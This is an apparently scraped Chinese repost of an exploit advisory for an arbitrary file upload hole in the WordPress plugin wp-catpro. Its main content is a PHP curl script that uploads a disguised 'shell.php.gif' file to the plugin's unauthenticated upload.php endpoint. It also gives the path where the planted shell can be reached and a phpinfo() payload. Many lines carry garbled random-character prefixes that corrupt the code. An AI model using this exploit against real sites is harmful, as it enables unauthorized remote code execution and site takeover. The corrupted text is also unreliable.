WordPress插件wp-catpro任意文件上传

admin

Wordpress plugins - wp-catpro Arbitrary File Upload Vulnerability
#-----------------------------------------------------------------------
8 f  r0 c5 {. o# _! ]6 a6 K& [
作者  => Zikou-16
邮箱 => zikou16x@gmail.com
# W8 c! r1 {( ~& d测试系统 : Windows 7 , Backtrack 5r3
  a3 J7 `8 O/ y: y下载地址 : http://xmlswf.com/images/stories/WP_plugins/wp-catpro.zip
####
2 n: ~4 Y. R# V9 c
#=> Exploit 信息:
------------------
# 攻击者可以上传 file/shell.php.gif
4 E! I4 @; R' r/ a( h# ("jpg", "gif", "png")  // Allowed file extensions
) ?! l  G( S  j2 z8 n9 ^9 @# "/uploads/";  // The path were we will save the file (getcwd() may not be reliable and should be tested in your environment)
4 v. a# y6 A/ f6 q! G/ \; o# '.A-Z0-9_ !@#$%^&()+={}\[\]\',~`-'; // Characters allowed in the file name (in a Regular Expression format)
" A& y0 c/ ^5 V# b: N( p------------------
9 K+ E: [" V7 c* v
. Y6 R4 r6 j& A#=> Exploit
-----------
<?php
7 O1 c% g( H0 _8 F) B
' m9 ]. Y( a: [$ |$uploadfile="zik.php.gif";
* S$ s* y# f$ A* P& F& W$ch = curl_init("http://[ www.2cto.com ]/[path]/wp-content/plugins/wp-catpro/js/swfupload/js/upload.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
' O6 N& M/ z' u- W8 Z+ d9 xarray('Filedata'=>"@$uploadfile",
'folder'=>'/wp-content/uploads/catpro/'));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
4 p3 A" U) y) q/ I* v3 N: A$postResult = curl_exec($ch);
curl_close($ch);

2 W) `. y  |# Y9 J4 R* [" Fprint "$postResult";

Shell Access : http://[ www.xxx.com ]/[path]/wp-content/uploads/catpro/random_name.php.gif
& w0 L0 V. [4 a/ K; a' b  u  ?>
<?php
, _! G  r7 S- z; z% vphpinfo();
?>